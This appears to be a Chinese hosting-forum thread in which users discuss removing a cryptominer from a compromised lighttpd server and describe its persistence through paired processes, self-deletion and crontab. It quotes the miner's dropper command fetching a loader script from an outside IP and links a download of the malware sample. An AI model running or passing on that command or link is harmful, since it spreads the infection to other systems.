全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
12
返回列表 发新帖
楼主: rwind

[lighttpd] 小鸡中挖矿病毒怎么解决

[复制链接]
 楼主| 发表于 2021-6-11 21:55:01 | 显示全部楼层
gyjys43043 发表于 2021-6-11 21:31
挖矿程序发出来给大家研究下呗

https://cloud.189.cn/t/AR7bUbaQNbMj (访问码:7mb0)
还在找,这应该是一个因为账号权限不高我看看破坏哪些文件了
发表于 2021-6-12 00:04:37 | 显示全部楼层
rwind 发表于 2021-6-11 21:55
https://cloud.189.cn/t/AR7bUbaQNbMj (访问码:7mb0)
还在找,这应该是一个因为账号权限不高我看看破坏哪 ...

这程序有点意思,居然还对cpu超频

sh -c "/sbin/modprobe msr > /dev/null 2>&1"
发表于 2021-6-12 00:13:01 | 显示全部楼层
重装系统
发表于 2021-6-12 00:39:11 | 显示全部楼层
备份重要文件 直接dd
发表于 2021-6-12 10:57:26 | 显示全部楼层
本帖最后由 gyjys43043 于 2021-6-12 11:05 编辑

这个挖矿程序的原理是
1. 会创建两个进程,一个主进程一个守护进程,并且运行后会立刻删掉磁盘上的文件
2. 任何一个进程被杀掉后,另外一个进程会立刻将自己重命名成一个随机的名字,并保存到一个随机文件夹下
3. 同时将刚保存的新文件路径写入到crontab中
以上就实现了循环启动

要杀掉它也很简单,并写脚本同时杀掉两个进程,并读取crontab然后删除那个随机文件
 楼主| 发表于 2021-6-12 14:26:23 | 显示全部楼层
gyjys43043 发表于 2021-6-12 10:57
这个挖矿程序的原理是
1. 会创建两个进程,一个主进程一个守护进程,并且运行后会立刻删掉磁盘上的文件
2.  ...

昨天随便看了一下
wget --user-agent e39dc295 -q -O - 194.145.227.21/ldr.sh
这脚本基本把思路是这样
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-30 21:42 , Processed in 0.059299 second(s), 6 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表